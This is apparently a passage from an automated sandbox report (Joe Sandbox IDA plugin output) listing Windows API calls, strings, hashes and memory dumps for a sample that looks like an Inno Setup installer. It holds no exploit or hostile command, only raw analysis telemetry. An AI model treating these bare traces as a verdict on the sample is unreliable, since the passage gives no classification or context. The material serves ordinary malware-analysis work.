                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                          • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                          Strings
                                                          • Failed to open Fonts registry key., xrefs: 004700A1
                                                          • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                          • AddFontResource, xrefs: 004700D5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                          • API String ID: 955540645-649663873
                                                          • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                          • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                          • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                          • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                          APIs
                                                            • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                            • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                            • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                          • GetVersion.KERNEL32 ref: 00462C88
                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                          • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                          • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                          • String ID: Explorer
                                                          • API String ID: 2594429197-512347832
                                                          • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                          • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                          • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                          • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8), ref: 00477E60
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                          • API String ID: 2704155762-2318956294
                                                          • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                          • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                          • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                          • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                            • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                          Strings
                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                          • Deleting directory: %s, xrefs: 00459C7B
                                                          • Failed to strip read-only attribute., xrefs: 00459CC0
                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                          • Stripped read-only attribute., xrefs: 00459CB4
                                                          • Failed to delete directory (%d)., xrefs: 00459D88
                                                          • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFindLast
                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                          • API String ID: 754982922-1448842058
                                                          • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                          • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                          • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                          • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                          APIs
                                                          • GetCapture.USER32 ref: 00422E9C
                                                          • GetCapture.USER32 ref: 00422EAB
                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                          • ReleaseCapture.USER32 ref: 00422EB6
                                                          • GetActiveWindow.USER32 ref: 00422EC5
                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                          • GetActiveWindow.USER32 ref: 00422FB7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                          • String ID:
                                                          • API String ID: 862346643-0
                                                          • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                          • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                          • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                          • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                          • GetActiveWindow.USER32 ref: 0042F2D2
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                          • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveLong$Message
                                                          • String ID:
                                                          • API String ID: 2785966331-0
                                                          • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                          • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                          • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                          • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                          APIs
                                                          • 73A1A570.USER32(00000000), ref: 00429482
                                                          • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                          • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                          • String ID:
                                                          • API String ID: 361401722-0
                                                          • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                          • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                          • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                          • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                          • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                          • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                          • String ID:
                                                          • API String ID: 3573811560-0
                                                          • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                          • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                          • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                          • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                          • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load
                                                          • String ID: $ $Internal error: Item already expanding
                                                          • API String ID: 1675784387-1948079669
                                                          • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                          • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                          • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                          • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                          • API String ID: 390214022-3304407042
                                                          • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                          • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                          • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                          • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                          APIs
                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                          • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                          • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A259ClassInfoMessageSend
                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                          • API String ID: 3217714596-4234151509
                                                          • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                          • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                          • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                          • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                            • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale$DefaultSystem
                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                          • API String ID: 1044490935-665933166
                                                          • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                          • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                          • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                          • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                            • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                            • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                          • String ID: ,$?
                                                          • API String ID: 2359071979-2308483597
                                                          • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                          • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                          • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                          • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                          APIs
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                          • DeleteObject.GDI32(?), ref: 0041BF97
                                                          • DeleteObject.GDI32(?), ref: 0041BFA0
                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                          • String ID:
                                                          • API String ID: 1030595962-0
                                                          • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                          • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                          • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                          • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                          APIs
                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                          • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
